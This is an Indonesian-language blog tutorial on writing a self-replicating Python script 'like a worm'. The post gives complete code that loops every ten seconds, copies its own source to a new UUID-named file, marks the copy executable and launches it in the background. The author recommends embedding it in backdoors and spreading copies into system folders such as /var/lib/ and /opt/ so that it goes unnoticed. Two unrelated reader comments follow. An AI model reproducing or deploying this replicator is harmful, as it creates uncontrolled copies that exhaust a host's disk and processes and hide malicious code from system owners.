Blog Emka

Portal tutorial linux, pemrograman sistem informasi, computer security & informasi santri Indonesia

Computer Security

Cara Membuat Script Python yang Mampu Self-Replicate (Mirip Worm)

Python diakui atau tidak adalah salah satu scripting language yang paling banyak digunakan sebagai bahasa pemrograman tool hacking dan backdoor dalam dunia Computer Security. Dalam tutorial singkat ini, kita akan membuat script python yang bisa mereplika dirinya sendiri, seperti layaknya Worm.

Source code dibawah ini sangat simple dan bisa diimplementasikan ke hampir semua backdoor yang kalian temui atau tulis sendiri. Tinggal taruh di modul main atau terserah kalian.

Pertama, kita akan membaca isi dari script python yang sedang berjalan (self content reading) dengan contoh script:

self_content = file(sys.argv[0]).read()

kemudian pada kondisi tertentu (dalam hal ini kita asumsikan saja true), beri jeda 10 detik, kemudian buat filename dengan uuid tertentu.

namafile = = "%s.py" % uuid.uuid4()

Kemudian tulis konten dari script yang sudah kita baca ke file yang kita berinama tadi:

# open and write to the copy
    copy = open(namafile, "w")
    copy.write(self_content)
    copy.close()

Jika membutuhkan akses supaya script baru tersebut executable, silakan ditambah script seperti ini:

# make the copy executable and execute
    os.chmod(namafile, 0755)
    os.system("./%s &" % namafile)

atau dalam versi utuhnya:

#!/usr/bin/python

import os, sys, time, uuid

# get self code
self_content = file(sys.argv[0]).read()

while True:
    # tunggu 10 detik
    time.sleep(10)
    
    # buat nama file, dengan UUID biar unik
    namafile = "%s.py" % uuid.uuid4()
    
    # write file
    copy = open(namafile, "w")
    copy.write(self_content)
    copy.close()    
    
    # buat jadi executable
    os.chmod(namafile, 0755)
    os.system("./%s &" % namafile)

Kalau dirasa masih kurang, bisa ditambahkan kondisi loop dari array folder path yang dikehendaki misal kita ingin menyebar ‘prototipe’ worm ini ke semua folder yang ditentukan misal /var/lib/, /opt/ dll lah yang penting tidak ketahuan…

2 Comments

  1. aasalamualaiqum….minta tolong donk …sy telah mengambil judul skripsi tentang SISTEM PENDAFTARAN WISUDA BERBASIS WEB …jd sy gak tau buat programnya, blh gak sy minta source codenya
    ?

    • Ifhtul Emka

      Silakan dicari ditempat lain mas/mbak. kursus aja sebulan 2 bulan pasti mahir programming

Leave a Reply

Theme by Anders Norén

%d bloggers like this: